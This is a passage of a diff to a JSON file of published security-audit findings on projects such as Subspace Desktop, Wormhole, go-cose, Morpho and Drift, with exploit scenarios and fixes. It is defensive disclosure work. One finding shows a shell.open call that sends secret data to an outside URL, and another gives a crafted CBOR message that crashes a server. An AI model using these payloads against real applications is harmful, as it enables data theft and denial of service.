regex's square brackets. \"shell\" : { \"all\" : true , \"execute\" : true , \"open\" : \"[/subspace\\\\-desktop/]\" , \"scope\" : [ \"name\" : \"run-osascript\" , \"cmd\" : \"osascript\" , \"args\" : true { } ] }, Figure 4.1: subspace-desktop/src-tauri/tauri.conf.json#L81-L92 For example, tauri.shell.open(\"s\") is accepted as a valid location because s is inside the regexs square brackets. Contrarily, tauri.shell.open(\"z\") is an invalid location because z is not inside the square brackets. Besides opening les, in Linux, the tauri.shell.open function will handle anything that the xdg-open command handles. For example, tauri.shell.open(\"apt://firefox\") shows users a prompt to install Firefox. Attackers could also use the tauri.shell.open function to make arbitrary HTTP requests and bypass the CSPs connect-src directive with calls such as tauri.shell.open(\"https:///?secret_data=\") . Exploit Scenario An attacker nds a cross-site scripting (XSS) vulnerability in the Subspace Desktop front end. He uses the XSS vulnerability to open an arbitrary URL protocol with the exploit described above and gains the ability to remotely execute code on the users machine. For examples of how common URL protocol handlers can lead to remote code execution attacks, refer to the vulnerabilities in the Steam and Visual Studio Code URL protocols. Recommendations Short term, revise the regex so that the front end can open only file: URLs that are within the Subspace Desktop applications logs folder. Alternatively, have the Rust back end serve these les and disallow the front end from accessing any les (see issue TOB-SPDF-5 for a more complete architectural recommendation). Long term, write positive and negative tests that check the developers assumptions related to the Tauri conguration. 5. Insu\u0000cient privilege separation between the front end and back end Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-SPDF-5 Target: The Subspace Desktop architecture", + "title": "14. Wormhole node does not build with latest Go version ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "Attempting to build a Wormhole node with the latest Go version (1.20.1) produces the error in gure 14.1. Gos release policy states, Each major Go release is supported until there are two newer major releases. By not building with the latest Go version, Wormholes ability to receive updates will expire. cannot use \"The version of quic-go you're using can't be built on Go 1.20 yet. For more details, please see https://github.com/lucas-clemente/quic-go/wiki/quic-go-and-Go-versions.\" (untyped string constant \"The version of quic-go you're using can't be built on Go 1.20 yet. F...) as int value in variable declaration Figure 14.1: Error produced when one tries to build the Wormhole with the latest Go version (1.20) It is unclear when Go 1.21 will be released. Go 1.20 was released on February 1, 2023 (a few days prior to the start of the audit), and new versions appear to be released about every six months. We found a thread discussing Go 1.21, but it does not mention dates. Exploit Scenario Alice attempts to build a Wormhole node with Go version 1.20. When her attempt fails, Alice switches to Go version 1.19. Go 1.21 is released, and Go 1.19 ceases to receive updates. A vulnerability is found in a Go 1.19 package, and Alice is left vulnerable. Recommendations Short term, adapt the code so that it builds with Go version 1.20. This will allow Wormhole to receive updates for a greater period of time than if it builds only with Go version 1.19. Long term, test with the latest Go version in CI. This will help identify incompatibilities like this one sooner. References Go Release History (see Release Policy) Planning Go 1.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2222,9 +4990,9 @@ ] }, { - "title": "6. Vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The Subspace Desktop Tauri application uses vulnerable Rust and Node dependencies, as reported by the cargo audit and yarn audit tools. Among the Rust crates used in the Tauri application, two are vulnerable, three are unmaintained, and six are yanked. The table below summarizes the ndings: Crate Version in Use Finding Latest Safe Version owning_ref 0.4.1 Memory corruption vulnerability ( RUSTSEC-2022-0040 ) Not available time 0.1.43 Memory corruption vulnerability ( RUSTSEC-2020-0071 ) 0.2.23 and newer ansi_term 0.12.1 dotenv 0.15.0 xml-rs 0.8.4 Unmaintained crate ( RUSTSEC-2021-0139 ) Unmaintained crate ( RUSTSEC-2021-0141 ) Unmaintained crate ( RUSTSEC-2022-0048 ) blake2 0.10.2 Yanked crate block-buffer 0.10.0 Yanked crate cpufeatures 0.2.1 Yanked crate iana-time-zone 0.1.44 Yanked crate Multiple alternatives dotenvy quick-xml 0.10.4 0.10.3 0.2.5 0.1.50 sp-version 5.0. For the Node dependencies used in the Tauri application, one is vulnerable to a high-severity issue and another is vulnerable to a moderate-severity issue. These vulnerable dependencies appear to be used only in the development dependencies. Package Finding Latest Safe Version got CVE-2022-33987 (Moderate severity) 11.8.5 and newer git-clone CVE-2022-25900 (High severity) Not available Exploit Scenario An attacker nds a way to exploit a known memory corruption vulnerability in one of the dependencies reported above and takes control of the application. Recommendations Short term, update the dependencies to their newest possible versions. Work with the library authors to update the indirect dependencies. Monitor the development of the x for owning_ref and upgrade it as soon as a safe version of the crate becomes available. Long term, run cargo audit and yarn audit regularly. Include cargo audit and yarn audit in the projects CI/CD pipeline to ensure that the team is aware of new vulnerabilities in the dependencies.", + "title": "15. Missing or wrong context ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "In several places where a Context is required, the Wormhole node creates a new background Context rather than using the passed-in Context. If the passed-in Context is canceled or times out, a go routine using the background Context will not detect this, and resources will be leaked. The aforementioned problem is agged by the contextcheck lint. For each of the locations named in gure 15.1, a Context is passed in to the enclosing function, but the passed-in Context is not used. Rather, a new background Context is created. algorand/watcher.go:172:51: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) status, err := algodClient.StatusAfterBlock(0).Do(context.Background()) ^ algorand/watcher.go:196:139: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) result, err := indexerClient.SearchForTransactions().TXID(base32.StdEncoding.WithPadding(base32.NoP adding).EncodeToString(r.TxHash)).Do(context.Background()) ^ algorand/watcher.go:205:42: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) block, err := algodClient.Block(r).Do(context.Background()) ^ Figure 15.1: Warnings produced by contextcheck A closely related problem is agged by the noctx lint. In each of the locations named in gure 15.2, http.Get or http.Post is used. These functions do not take a Context argument. As such, if the Context passed in to the enclosing function is canceled, the Get or Post will not similarly be canceled. cosmwasm/watcher.go:198:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/%s\", e.urlLCD, e.latestBlockURL)) ^ cosmwasm/watcher.go:246:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/cosmos/tx/v1beta1/txs/%s\", e.urlLCD, tx)) ^ sui/watcher.go:315:26: net/http.Post must not be called (noctx) resp, err := http.Post(e.suiRPC, \"application/json\", strings.NewReader(buf)) ^ sui/watcher.go:378:26: net/http.Post must not be called (noctx) strings.NewReader(`{\"jsonrpc\":\"2.0\", \"id\": 1, \"method\": \"sui_getCommitteeInfo\", \"params\": []}`)) resp, err := http.Post(e.suiRPC, \"application/json\", ^ wormchain/watcher.go:136:27: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/blocks/latest\", e.urlLCD)) Figure 15.2: Warnings produced by noctx ^ Exploit Scenario A bug causes Alices Algorand, Cosmwasm, Sui, or Wormchain node to hang. The bug triggers repeatedly. The connections from Alices Wormhole node to the respective blockchain nodes hang, causing unnecessary resource consumption. Recommendations Short term, take the following steps: For each location named in gure 15.1, use the passed-in Context rather than creating a new background Context. For each location named in gure 15.2, rewrite the code to use http.Client.Do. Taking these steps will help to prevent unnecessary resource consumption and potential denial of service. Long term, enable the contextcheck and notctx lints in CI. The problems highlighted in this nding were uncovered by those lints. Running them regularly could help to identify similar problems. References checkcontext noctx", "labels": [ "Trail of Bits", "Severity: Low", @@ -2232,9 +5000,9 @@ ] }, { - "title": "7. Broken error reporting link ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The create_full_client function calls the sp_panic_handler::set() function to set a URL for a Discord invitation; however, this invitation is broken. The documentation for the sp_panic_handler::set() function states that The bug_url parameter is an invitation for users to visit that URL to submit a bug report in the case where a panic happens. Because the link is broken, users cannot submit bug reports. sp_panic_handler::set( \" https://discord.gg/vhKF9w3x \" , env! ( \"SUBSTRATE_CLI_IMPL_VERSION\" ), ); Figure 7.1: subspace-desktop/src-tauri/src/node.rs#L169-L172 Exploit Scenario A user encounters a crash of Subspace Desktop and is presented with a broken link with which to report the error. The user is unable to report the error. Recommendations Short term, update the bug report link to the correct Discord invitation. Long term, use a URL on a domain controlled by Subspace Network as the bug reporting URL. This will allow Subspace Network developers to make adjustments to the reporting URL without pushing application updates. 8. Side e\u0000ects are triggered regardless of disk_farms validity Severity: Informational Diculty: High Type: Data Validation Finding ID: TOB-SPDF-8 Target: src-tauri/src/farmer.rs#L118-L192", + "title": "16. Use of defer in a loop ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The Solana watcher uses defer within an innite loop (gure 16.1). Deferred calls are executed when their enclosing function returns. Since the enclosing loop is not exited under normal circumstances, the deferred calls are never executed and constitute a waste of resources. for { select { case <-ctx.Done(): return nil default: rCtx, cancel := context.WithTimeout(ctx, time.Second*300) // 5 minute defer cancel() ... } } Figure 16.1: node/pkg/watchers/solana/client.go#L244L271 Sample code demonstrating the problem appears in appendix E. Exploit Scenario Alice runs her Wormhole node in an environment with constrained resources. Alice nds that her node is not able to achieve the same uptime as other Wormhole nodes. The underlying cause is resource exhaustion caused by the Solana watcher. Recommendations Short term, rewrite the code in gure 16.1 to eliminate the use of defer in the for loop. The easiest and most straightforward way would likely be to move the code in the default case into its own named function. Eliminating this use of defer in a loop will eliminate a potential source of resource exhaustion. Long term, regularly review uses of defer to ensure they do not appear in a loop. To the best of our knowledge, there are not publicly available detectors for problems like this. However, regular manual review should be sucient to spot them.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2242,9 +5010,9 @@ ] }, { - "title": "9. Network conguration path construction is duplicated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The create_full_client function contains code that uses hard-coded strings to indicate conguration paths (gure 9.1) in place of the previously dened DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values, which are used in the other parts of the code. This is a risky coding pattern, as a Subspace developer who is updating the DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values may forget to also update the equivalent values used in the create_full_client function. if primary_chain_node.client.info().best_number == 33670 { if let Some (config_dir) = config_dir { let workaround_file = config_dir.join( \"network\" ).join( \"gemini_1b_workaround\" ); if !workaround_file.exists() { let _ = std::fs::write(workaround_file, &[]); let _ = std::fs::remove_file( config_dir.join( \"network\" ).join( \"secret_ed25519\" ) ); return Err (anyhow!( \"Applied workaround for upgrade from gemini-1b-2022-jun-08, \\ please restart this node\" )); } } } Figure 9.1: subspace-desktop/src-tauri/src/node.rs#L207-L219 Recommendations Short term, update the code in gure 9.1 to use DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE rather than the hard-coded values. This will make eventual updates to these paths less error prone.", + "title": "17. Finalizer is allowed to be nil ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The conguration of a chains watcher can allow a nalizer to be nil, which may allow newly introduced bugs to go unnoticed. Whenever a chains RPC does not have a notion of safe or nalized blocks, the watcher polls the chain for the latest block using BlockPollConnector. After fetching a block, the watcher checks whether it is nal in accordance with the respective chains PollFinalizer implementation. // BlockPollConnector polls for new blocks instead of subscribing when using SubscribeForBlocks. It allows to specify a // finalizer which will be used to only return finalized blocks on subscriptions. type BlockPollConnector struct { Connector time.Duration Delay useFinalized bool publishSafeBlocks bool finalizer blockFeed errFeed PollFinalizer ethEvent.Feed ethEvent.Feed } Figure 17.1: node/pkg/watchers/evm/connectors/poller.go#L24L34 However, the method pollBlocks allows BlockPollConnector to have a nil PollFinalizer (see gure 17.2). This is unnecessary and may permit edge cases that could otherwise be avoided by requiring all BlockPollConnectors to use the DefaultFinalizer explicitly if a nalizer is not required (the default nalizer accepts all blocks as nal). This will ensure that the watcher does not incidentally process a block received from blockFeed that is not in the canonical chain . if b.finalizer != nil { finalized, err := b.finalizer.IsBlockFinalized(timeout, block) if err != nil { logger.Error(\"failed to check block finalization\", zap.Uint64(\"block\", block.Number.Uint64()), zap.Error(err)) finalization (%d): %w\", block.Number.Uint64(), err) return lastPublishedBlock, fmt.Errorf(\"failed to check block } if !finalized { break } } b.blockFeed.Send(block) lastPublishedBlock = block Figure 17.2: node/pkg/watchers/evm/connectors/poller.go#L149L164 Exploit Scenario A developer adds a new chain to the watcher using BlockPollConnector and forgets to add a PollFinalizer. Because a nalizer is not required to receive the latest blocks, transactions that were not included in the blockchain are considered valid, and funds are incorrectly transferred without corresponding deposits. Recommendations Short term, rewrite the block poller to require a nalizer. This makes the conguration of the block poller explicit and claries that a DefaultFinalizer is being used, indicating that no extra validations are being performed. Long term, document the conguration and assumptions of each chain. Then, see if any changes could be made to the code to clarify the developers intentions.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2252,29 +5020,19 @@ ] }, { - "title": "1. Unmarshalling can cause a panic if any header labels are unhashable ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", - "body": "The ensureCritical function checks that all critical labels exist in the protected header. The check for each label is shown in Figure 1.1. 161 if _, ok := h[label]; !ok { Figure 1.1: Line 161 of headers.go The label in this case is deserialized from the users CBOR input. If the label is a non-hashable type (e.g., a slice or a map), then Go will runtime panic on line 161. Exploit Scenario Alice wishes to crash a server running go-cose. She sends the following CBOR message to the server: \\xd2\\x84G\\xc2\\xa1\\x02\\xc2\\x84@0000C000C000. When the server attempts to validate the critical headers during unmarshalling, it panics on line 161. Recommendations Short term, add a validation step to ensure that the elements of the critical header are valid labels. Long term, integrate go-coses existing fuzz tests into the CI pipeline. Although this bug was not discovered using go-coses preexisting fuzz tests, the tests likely would have discovered it if they ran for enough time. Fix Analysis This issue has been resolved. Pull request #78, committed to the main branch in b870a00b4a0455ab5c3da1902570021e2bac12da, adds validations to ensure that critical headers are only integers or strings. 15 Microsoft go-cose Security Assessment (DRAFT)", - "labels": [ - "Trail of Bits", - "Severity: High", - "Difficulty: Low" - ] - }, - { - "title": "2. crit label is permitted in unvalidated headers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", - "body": "The crit header parameter identies which header labels must be understood by an application receiving the COSE message. Per RFC 8152, this value must be placed in the protected header bucket, which is authenticated by the message signature. Figure 2.1: Excerpt from RFC 8152 section 3.1 Currently, the implementation ensures during marshaling and unmarshaling that if the crit parameter is present in the protected header, then all indicated labels are also present in the protected header. However, the implementation does not ensure that the crit parameter is not present in the unprotected bucket. If a user mistakenly uses the unprotected header for the crit parameter, then other conforming COSE implementations may reject the message and the message may be exposed to tampering. Exploit Scenario A library user mistakenly places the crit label in the unprotected header, allowing an adversary to manipulate the meaning of the message by adding, removing, or changing the set of critical headers. Recommendations Add a check during ensureCritical to verify that the crit label is not present in the unprotected header bucket. Fix Analysis This issue has been resolved. Pull request #81, committed to the main branch in 62383c287782d0ba5a6f82f984da0b841e434298, adds validations to ensure that the crit label is not present in unprotected headers. 16 Microsoft go-cose Security Assessment (DRAFT)", + "title": "1. Lack of build instructions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol repository does not contain instructions to build, compile, test, or run the project. The projects README should include at least the following information: Instructions for building the project Instructions for running the built artifacts Instructions for running the projects tests The closest thing we have found to build instructions appears in a script in the drift-sim repository (gure 1.1). As shown in the gure below, building the project is non-trivial. Users should not be required to rediscover these steps on their own. git submodule update --init --recursive # build v2 cd driftpy/protocol-v2 yarn && anchor build # build dependencies for v2 cd deps/serum-dex/dex && anchor build && cd ../../.. # go back to top-level cd ../../ Figure 1.1: drift-sim/setup.sh Additionally, the project relies on serum-dex , which currently has an open issue regarding outdated build instructions. Thus, if a user visits the serum-dex repository to learn how to build the dependency, they will be misled. Exploit Scenario Alice attempts to build and deploy her own copy of the Drift Protocol smart contract. Without instructions, Alice deploys it incorrectly. Users of Alices copy of the smart contract suer nancial loss. Recommendations Short term, add the minimal information listed above to the projects README . This will help users to build, run, and test the project . Long term, as the project evolves, ensure that the README is updated. This will help ensure that the README does not communicate incorrect information to users . References Documentation points to do.sh", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "3. Generic COSE header types are not validated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", - "body": "Section 3.1 of RFC 8152 denes a number of common COSE header parameters and their associated value types. Applications using the go-cose library may rely on COSE-dened headers decoded by the library to be of a specied type. For example, the COSE specication denes the content-type header (label #3) as one of two types: a text string or an unsigned integer. The go-cose library validates only the alg and crit parameters, not content-type. See Figure 3.1 for a list of dened header types. Figure 3.1: RFC 8152 Section 3.1, Table 2 Further header types are dened by the IANA COSE Header Parameter Registry. 17 Microsoft go-cose Security Assessment (DRAFT) Exploit Scenario An application uses go-cose to verify and validate incoming COSE messages. The application uses the content-type header to index a map, expecting the content type to be a valid string or integer. An attacker could, however, supply an unhashable value, causing the application to panic. Recommendations Short term, explicitly document which IANA-dened headers or label ranges are and are not validated. Long term, validate commonly used headers for type and semantic consistency. For example, once counter signatures are implemented, the counter-signature (label #7) header should be validated for well-formedness during unmarshalling. 18 Microsoft go-cose Security Assessment (DRAFT)", + "title": "2. Inadequate testing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Anchor tests are not run as part of Drift Protocols CI process. Moreover, the script responsible for running the Anchor tests does not run all of them. Integrating all Anchor tests into the CI process and updating the script so it runs all tests will help ensure they are run regularly and consistently. Figure 2.1 shows a portion of the projects main GitHub workow, which runs the projects unit tests. However, the le makes no reference to the projects Anchor tests. - name : Run unit tests run : cargo test --lib # run unit tests Figure 2.1: .github/workflows/main.yml#L52L53 Furthermore, the script used to run the Anchor tests runs only some of them. The relevant part of the script appears in gure 2.2. The test_files array contains the names of nearly all of the les containing tests in the tests directory. However, the array lacks the following entries, and consequently does not run their tests: ksolver.ts tokenFaucet.ts test_files =( postOnlyAmmFulfillment.ts imbalancePerpPnl.ts ... # 42 entries cancelAllOrders.ts ) Figure 2.2: test-scripts/run-anchor-tests.sh#L7L53 Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces a bug into the codebase. The test would be revealed by the Anchor tests. However, because the Anchor tests are not run in CI, the bug goes unnoticed. Recommendations Short term: Adjust the main GitHub workow so that it runs the Anchor tests. Adjust the run-anchor-tests.sh script so that it runs all Anchor tests (including those in ksolver.ts and tokenFaucet.ts ). Taking these steps will help to ensure that all Anchor tests are run regularly and consistently. Long term, revise the run-anchor-tests.sh script so that the test_files array is not needed. Move les that do not contain tests into a separate directory, so that only les containing tests remain. Then, run the tests in all les in the tests directory. Adopting such an approach will ensure that newly added tests are automatically run.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2282,9 +5040,9 @@ ] }, { - "title": "1. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The owner of the IncentivesVault contract and other Ownable Morpho contracts can be changed by calling the transferOwnership function. This function internally calls the _transferOwnership function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. 13 contract IncentivesVault is IIncentivesVault, Ownable { Figure 1.1: Inheritance of contracts/compound/IncentivesVault.sol 62 function transferOwnership(address newOwner) public virtual onlyOwner { 63 64 65 } require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); Figure 1.2: The transferOwnership function in @openzeppelin/contracts/access/Ownable.sol Exploit Scenario Bob, the IncentivesVault owner, invokes transferOwnership() to change the contracts owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, for contract ownership transfers, implement a two-step process, in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "3. Invalid audit.toml prevents cargo audit from being run ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The projects anchor.toml le contains an invalid key. This makes running cargo audit on the project impossible. The relevant part of the audit.toml le appears in gure 3.1. The packages key is unrecognized by cargo audit . As a result, cargo audit produces the error in gure 3.2 when run on the protocol-v2 repository. [packages] source = \"all\" # \"all\", \"public\" or \"local\" Figure 3.1: .cargo/audit.toml#L27L28 error: cargo-audit fatal error: parse error: unknown field `packages`, expected one of `advisories`, `database`, `output`, `target`, `yanked` at line 30 column 1 Figure 3.2: Error produced by cargo audit when run on the protocol-v2 repository Exploit Scenario A vulnerability is discovered in a protocol-v2 dependency. A RUSTSEC advisory is issued for the vulnerability, but because cargo audit cannot be run on the repository, the vulnerability goes unnoticed. Users suer nancial loss. Recommendations Short term, either remove the packages table from the anchor.toml le or replace it with a table recognized by cargo audit . In the projects current state, cargo audit cannot be run on the project. Long term, regularly run cargo audit in CI and verify that it runs to completion without producing any errors or warnings. This will help the project receive the full benets of running cargo audit by identifying dependencies with RUSTSEC advisories.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2292,19 +5050,19 @@ ] }, { - "title": "2. Incomplete information provided in Withdrawn and Repaid events ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The core operations in the PositionsManager contract emit events with parameters that provide information about the operations actions. However, two events, Withdrawn and Repaid, do not provide complete information. For example, the withdrawLogic function, which performs withdrawals, takes a _supplier address (the user supplying the tokens) and _receiver address (the user receiving the tokens): /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external Figure 2.1: The function signature of PositionsManagers withdrawLogic function However, the corresponding event in _safeWithdrawLogic records only the msg.sender of the transaction, so the _supplier and _receiver involved in the transaction are unclear. Moreover, if a withdrawal is performed as part of a liquidation operation, three separate addresses may be involvedthe _supplier, the _receiver, and the _user who triggered the liquidationand those monitoring events will have to cross-reference multiple events to understand whose tokens moved where. /// @notice Emitted when a withdrawal happens. /// @param _user The address of the withdrawer. /// @param _poolTokenAddress The address of the market from where assets are withdrawn. /// @param _amount The amount of assets withdrawn (in underlying). /// @param _balanceOnPool The supply balance on pool after update. /// @param _balanceInP2P The supply balance in peer-to-peer after update. event Withdrawn( address indexed _user, Figure 2.2: The declaration of the Withdrawn event in PositionsManager emit Withdrawn( msg.sender, _poolTokenAddress, _amount, supplyBalanceInOf[_poolTokenAddress][msg.sender].onPool, supplyBalanceInOf[_poolTokenAddress][msg.sender].inP2P ); Figure 2.3: The emission of the Withdrawn event in the _safeWithdrawLogic function A similar issue is present in the _safeRepayLogic functions Repaid event. Recommendations Short term, add the relevant addresses to the Withdrawn and Repaid events. Long term, review all of the events emitted by the system to ensure that they emit sucient information.", + "title": "4. Race condition in Drift SDK ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "A race condition in the Drift SDK causes client programs to operate on non-existent or possibly stale data. The race condition aects many of the projects Anchor tests, making them unreliable. Use of the SDK in production could have nancial implications. When running the Anchor tests, the error in gure 4.1 appears frequently. The data eld that the error refers to is read by the getUserAccount function (gure 4.2). This function tries to read the data eld from a DataAndSlot object obtained by calling getUserAccountAndSlot (gure 4.3). That DataAndSlot object is set by the handleRpcResponse function (gure 4.4). TypeError: Cannot read properties of undefined (reading 'data') at User.getUserAccount (sdk/src/user.ts:122:56) at DriftClient.getUserAccount (sdk/src/driftClient.ts:663:37) at DriftClient. (sdk/src/driftClient.ts:1005:25) at Generator.next () at fulfilled (sdk/src/driftClient.ts:28:58) at processTicksAndRejections (node:internal/process/task_queues:96:5) Figure 4.1: Error that appears frequently when running the Anchor tests public getUserAccount(): UserAccount { return this .accountSubscriber.getUserAccountAndSlot(). data ; } Figure 4.2: sdk/src/user.ts#L121L123 public getUserAccountAndSlot(): DataAndSlot { this .assertIsSubscribed(); return this .userDataAccountSubscriber. dataAndSlot ; } Figure 4.3: sdk/src/accounts/webSocketUserAccountSubscriber.ts#L72L75 handleRpcResponse(context: Context , accountInfo?: AccountInfo ): void { ... if (newBuffer && (!oldBuffer || !newBuffer.equals(oldBuffer))) { this .bufferAndSlot = { buffer: newBuffer , slot: newSlot , }; const account = this .decodeBuffer(newBuffer); this .dataAndSlot = { data: account , slot: newSlot , }; this .onChange(account); } } Figure 4.4: sdk/src/accounts/webSocketAccountSubscriber.ts#L55L95 If a developer calls getUserAccount but handleRpcResponse has not been called since the last time the account was updated, stale data will be returned. If handleRpcResponse has never been called for the account in question, an error like that shown in gure 4.1 arises. Note that a developer can avoid the race by calling WebSocketAccountSubscriber.fetch (gure 4.5). However, the developer must manually identify locations where such calls are necessary. Errors like the one shown in gure 4.1 appear frequently when running the Anchor tests, which suggests that identifying such locations is nontrivial. async fetch(): Promise < void > { const rpcResponse = await this .program.provider.connection.getAccountInfoAndContext( this .accountPublicKey, ( this .program.provider as AnchorProvider).opts.commitment ); this .handleRpcResponse(rpcResponse.context, rpcResponse?.value); } Figure 4.5: sdk/src/accounts/webSocketAccountSubscriber.ts#L46L53 We suspect this problem applies to not just user accounts, but any account fetched via a subscription mechanism (e.g., state accounts or perp market accounts). Note that despite the apparent race condition, Drift Protocol states that the tests run reliably for them. Exploit Scenario Alice, unaware of the race condition, writes client code that uses the Drift SDK. Alices code unknowingly operates on stale data and proceeds with a transaction, believing it will result in nancial gain. However, when processed with actual on-chain data, the transaction results in nancial loss for Alice. Recommendations Short term, rewrite all account getter functions so that they automatically call WebSocketAccountSubscriber.fetch . This will eliminate the need for developers to deal with the race manually. Long term, investigate whether using a subscription mechanism is actually needed. Another Solana RPC call could solve the same problem yet be more ecient than a subscription combined with a manual fetch.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "3. Missing access control check in withdrawLogic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The PositionsManager contracts withdrawLogic function does not perform any access control checks. In practice, this issue is not exploitable, as all interactions with this contract will be through delegatecalls with a hard-coded msg.sender sent from the main Morpho contract. However, if this code is ever reused or if the architecture of the system is ever modied, this guarantee may no longer hold, and users without the proper access may be able to withdraw funds. /// @dev Implements withdraw logic with security checks. /// @param _poolTokenAddress The address of the market the user wants to interact with. /// @param _amount The amount of token (in underlying). /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external { Figure 3.1: The withdrawLogic function, which takes a supplier and whose comments note that it performs security checks Recommendations Short term, add a check to the withdrawLogic function to ensure that it withdraws funds only from the msg.sender. Long term, implement security checks consistently throughout the codebase.", + "title": "5. Loose size coupling between function invocation and requirement ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The implementation of the emit_stack function relies on the caller to use a suciently large buer space to hold a Base64-encoded representation of the discriminator along with the serialized event. Failure to provide sucient space will result in an out-of-bounds attempt on either the write operation or the in the base64::encode_config_slice call. emit_stack::<_, 424 >(order_action_record); Figure 5.1: programs/drift/src/controller/orders.rs#L545 pub fn emit_stack (event: T ) { let mut data_buf = [ 0 u8 ; N]; let mut out_buf = [ 0 u8 ; N]; emit_buffers(event, & mut data_buf[..], & mut out_buf[..]) } pub fn emit_buffers ( event: T , data_buf: & mut [ u8 ], out_buf: & mut [ u8 ], ) { let mut data_writer = std::io::Cursor::new(data_buf); data_writer .write_all(&::discriminator()) .unwrap(); borsh::to_writer(& mut data_writer, &event).unwrap(); let data_len = data_writer.position() as usize ; let out_len = base64::encode_config_slice( &data_writer.into_inner()[ 0 ..data_len], base64::STANDARD, out_buf, ); let msg_bytes = &out_buf[ 0 ..out_len]; let msg_str = unsafe { std:: str ::from_utf8_unchecked(msg_bytes) }; msg!(msg_str); } Figure 5.2: programs/drift/src/state/events.rs#L482L511 Exploit Scenario A maintainer of the smart contract is unaware of this implicit size requirement and adds a call to emit_stack using too small a buer, or changes are made to a type without a corresponding change to all places where emit_stack uses that type. If the changed code is not covered by tests, the problem will manifest during contract operation, and could cause an instruction to panic, thereby reverting the transaction. Recommendations Short term, add a size constant to the type, and calculate the amount of space required for holding the respective buers. This ensures that changes to a type's size can be made throughout the code. Long term, create a trait to be used by the types with which emit_stack is intended to work. This can be used to handle the size of the type, and also any other future requirement for types used by emit_stack .", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2312,9 +5070,9 @@ ] }, { - "title": "4. Lack of zero address checks in setter functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. A mistake like this could initially go unnoticed because a delegatecall to an address without code will return success. /// @notice Sets the `positionsManager`. /// @param _positionsManager The new `positionsManager`. function setPositionsManager(IPositionsManager _positionsManager) external onlyOwner { positionsManager = _positionsManager; emit PositionsManagerSet(address(_positionsManager)); } Figure 4.1: An important address setter in MorphoGovernance Exploit Scenario Alice and Bob control a multisignature wallet that is the owner of a deployed Morpho contract. They decide to set _positionsManager to a newly upgraded contract but, while invoking setPositionsManager, they mistakenly omit the address. As a result, _positionsManager is set to the zero address, resulting in undened behavior. Recommendations Short term, add zero-value checks to all important address setters to ensure that owners cannot accidentally set addresses to incorrect values, 